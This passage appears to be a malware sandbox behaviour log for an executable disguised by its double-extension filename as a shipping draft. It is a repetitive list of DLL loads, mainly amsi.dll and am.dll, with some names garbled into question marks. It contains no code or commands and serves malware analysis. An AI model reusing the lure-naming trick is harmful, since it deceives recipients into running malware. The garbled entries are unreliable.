Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
